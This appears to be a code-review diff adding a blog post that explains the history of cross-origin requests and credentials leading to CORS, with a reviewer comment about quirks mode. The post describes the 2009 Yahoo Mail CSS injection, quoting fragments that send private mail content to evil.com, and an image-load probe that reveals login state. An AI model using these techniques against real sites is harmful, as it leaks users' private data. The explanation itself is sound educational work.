static-build/posts/2021/09/cors/index.md

```diff
@@ -0,0 +1,354 @@
+
+Browsers have been able to include images from other sites for almost 30 years. You don't need the other site's permission to do this, you can just do it. And it didn't stop with images:
+
+```html
+<script src="…"></script>
+<link rel="stylesheet" href="…" />
+<iframe src="…"></iframe>
+<video src="…"></video>
+<audio src="…"></audio>
+```
+
+APIs like these let you make a request to another website and process the response in a particular way, without the other site's consent.
+
+This started getting complicated in 1994 with the advent of HTTP cookies. HTTP cookies became part of a set of things we call _credentials_, which also includes TLS client certificates, and the state that automatically goes in the `Authorization` request header when using HTTP authentication (if you've never heard of this, don't worry, it's shite).
+
+Credentials mean web content can be tailored for a particular user. It's how Twitter shows you _your_ feed, it's how your bank shows you _your_ accounts.
+
+When you request other-site content using one of the methods above, it sends along the credentials for the other-site. And over the years that's created a colossal sackload of security issues.
+
+```html
+<img src="https://your-bank/your-profile/you.jpg" />
+```
+
+If the above image loads, I get a `load` event. If it doesn't load, I get an `error` event. If that differs depending on if you're logged in or not, that tells me a lot about you. I can also read the width and height of the image, which, if it differs from user to user, tells me even more.
+
+This gets worse with a format like CSS, which has more capabilities, but doesn't immediately fail on parse errors. In 2009 it turned out Yahoo Mail was vulnerable to a fairly simple exploit. The attacker sends the user one email with a subject including `');}`, and later another with a subject including `{}html{background:url('//evil.com/?`. This means the user's mail page includes `{}html{background:url('//evil.com/?`, followed by some page source which includes their details and emails, followed by `');}`, which put together can form a valid chunk of CSS. Then, the attacker convinces the user to visit a page containing:
+
+```html
+<link rel="stylesheet" href="https://m.yahoo.com/mail" />
+```
+
+…which is loaded using `yahoo.com`'s cookies, the CSS parses, and sends private information to `evil.com`. Oh no.
+
+# Locking things down
+
+It's become pretty clear that the above was a mistake in the design of the web, so we no longer create APIs that can process these kinds of requests. Meanwhile, we've spent the last few decades patching things up as best we can:
+
+- CSS from another origin (I'll get to a definition of that shortly) now needs to be sent with a CSS `Content-Type`. Unfortunately we can't enforce the same thing for scripts and images without breaking significant portions of the web. However…
```

Comment:
Except in quirks mode. I wonder if we can remove that quirk now. Is there a use counter?

https://html.spec.whatwg.org/multipage/links.html#link-type-stylesheet